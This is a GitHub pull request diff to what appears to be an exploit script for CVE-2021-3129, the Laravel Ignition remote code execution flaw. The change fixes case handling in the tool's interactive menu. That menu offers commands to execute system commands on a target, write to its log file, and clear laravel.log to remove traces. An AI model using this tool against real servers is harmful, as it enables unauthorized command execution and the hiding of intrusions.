Merge pull request joshuavanderpoll#6 from cri1wa/patch-1

fix:The problem of input character case
cri1wa · Mar 22, 2023 · fc903f0 · fc903f0
2 parents b2f0752 + 4d7d212
commit fc903f0
Showing 1 changed file with 14 additions and 10 deletions.
diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py
@@ -70,20 +70,24 @@ def start(self):
 
     def ask_command(self):
         response = input(f"{PURPLE}[?] Please enter a command to execute: {END}")
-
-        response = response.lower()
-        if response == "?" or response == "help":  # Return list of commands
+        response_list = response.split(" ",1)
+        command = response_list[0].lower()
+        if(len(response_list) == 2):
+            payload = response_list[1]
+        else:
+            payload = "null"
+        if command == "?" or command == "help":  # Return list of commands
             self.cmd_help()
-        elif response == "exit":  # Stop script
+        elif command == "exit":  # Stop script
             exit()
-        elif response == "clear_logs":  # Attempt to clear laravel.log of target
+        elif command == "clear_logs":  # Attempt to clear laravel.log of target
             self.cmd_clear_logs()
-        elif response[0:7] == "execute":  # Attempt to execute system command on target
-            self.cmd_execute_cmd(response[8:])
-        elif response[0:5] == "write":  # Attempt to write to the log file of target
-            self.cmd_execute_write(response[6:])
+        elif command == "execute":  # Attempt to execute system command on target
+            self.cmd_execute_cmd(payload)
+        elif command == "write":  # Attempt to write to the log file of target
+            self.cmd_execute_write(payload)
         else:
-            print(RED + f"[!] No command found named \"{response}\".")
+            print(RED + f"[!] No command found named \"{command}\".")
 
         self.ask_command()